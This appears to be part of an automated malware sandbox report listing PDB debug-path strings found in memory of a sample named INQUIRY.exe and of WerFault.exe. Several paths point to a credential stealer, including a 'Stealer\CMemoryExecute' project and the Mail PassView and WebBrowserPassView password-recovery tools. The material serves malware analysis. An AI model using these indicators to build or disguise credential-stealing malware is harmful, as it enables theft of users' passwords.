                    Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbS source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee-c source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: tsymbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: combase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdbThqia source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: 1_oC:\Windows\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: crypt32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb; source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: edputil.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdbi source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb1 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.698848743.00000000049D4000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdbJhgiX source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb$hAi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb/ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: profapi.pdbkRi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb6hSi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winnsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb] source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\mscorlib.pdbd source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdbo source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdbqa{ source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: INQUIRY.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: sxs.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rtutils.pdb? source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoree.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbxi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Z[zTs5.pdb6 source: INQUIRY.exe, 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp
                    Source: Binary string: cordacwks.pdb^hkiY source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb@hmi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdbG source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wwin32u.pdb) source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: security.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb{ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdbLhYiL source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbo source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp
                    Source: Binary string: sechost.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb7 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.698225687.0000000002BC7000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb9 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb&kpir source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb(kji source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb# source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: .pdb* source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: secur32.pdbvi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb5 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb! source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbe source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcr80.i386.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdbq source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb.h;i source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb"hOi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winhttp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorsec.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorwks.pdb% source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbH source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rtutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: mscorwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: oleaut32.pdb8hUi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\Microsoft.VisualBasic.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorjit.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: shfolder.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdbe source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb_ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasman.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: fastprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp
